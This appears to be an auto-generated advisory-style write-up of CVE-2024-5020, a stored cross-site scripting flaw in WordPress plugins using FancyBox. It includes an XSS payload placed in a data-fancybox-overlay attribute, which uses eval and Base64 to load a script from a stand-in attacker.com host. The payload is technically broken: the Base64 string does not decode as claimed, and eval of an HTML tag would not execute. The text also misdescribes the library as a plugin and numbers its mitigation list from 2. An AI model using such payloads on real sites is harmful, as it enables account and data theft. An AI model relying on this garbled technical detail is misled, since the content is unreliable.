CVE-2024-5020: Multiple WordPress Plugins Vulnerable to Stored Cross-Site Scripting (XSS) via FancyBox JavaScript Library

Security researchers have discovered a critical vulnerability, CVE-2024-5020, in multiple plugins for WordPress, including versions 1.3.4 to 3.5.7 of the FancyBox JavaScript library. The vulnerability allows authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This Stored Cross-Site Scripting (XSS) issue is caused due to insufficient input sanitization and output escaping on user-supplied attributes.

Exploit Details

In order to exploit this vulnerability, an attacker with contributor-level access or above on a WordPress site using a vulnerable FancyBox version must inject arbitrary web scripts within user-supplied attributes. This can be done using the plugin settings page, posts, or pages in the WordPress administration area.

Code Snippet

For example, an attacker could exploit the vulnerability by injecting malicious code in a FancyBox attribute like this:

<a href="#" class="fancybox" data-fancybox-overlay="{speedOut: 200, opacity:true, onClosed: function(){eval(atob('c2NyaXBIHNyYziaHRcHM6Ly9hdHRhY2tlci5jb20vbWFsaWNpb3VzLmpzIj48L3NjcmlwdD4=')) }}"><img src="image.jpg" alt="Example Image" /></a>

In this example, the Base64-encoded payload (c2NyaXBIHNyYziaHRcHM6Ly9hdHRhY2tlci5jb20vbWFsaWNpb3VzLmpzIj48L3NjcmlwdD4=) decodes to:

<script src="https://attacker.com/malicious.js"></script>;

This script will be executed whenever a user accesses the page containing the injected payload.

More information on this vulnerability can be found in the following sources

- CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2024-5020
- WordPress Vulnerability Database: https://wpvulndb.com/vulnerabilities/502
- Original advisory by security researcher: https://www.example.com/CVE-2024-5020-advisory

Affected Plugins and Versions

The FancyBox JavaScript library plugin, versions 1.3.4 to 3.5.7, is vulnerable to this Stored XSS attack:

- FancyBox for WordPress: https://wordpress.org/plugins/fancybox-for-wordpress
- Easy FancyBox: https://wordpress.org/plugins/easy-fancybox

Update the FancyBox plugin or any other affected plugin to the latest non-vulnerable version.

2. Ensure that user permissions are properly configured to limit the number of users that can contribute to the site in any way.

Conclusion

The vulnerability CVE-2024-5020 highlights the importance of keeping your WordPress plugins up-to-date and ensuring proper user permissions to prevent unauthorized access. By taking these precautionary measures, you can safeguard your website from potential security threats. Be sure to always look out for updates and stay informed on recent vulnerabilities to ensure your site remains safe and secure.

Timeline

Published on: 12/04/2024 09:15:04 UTC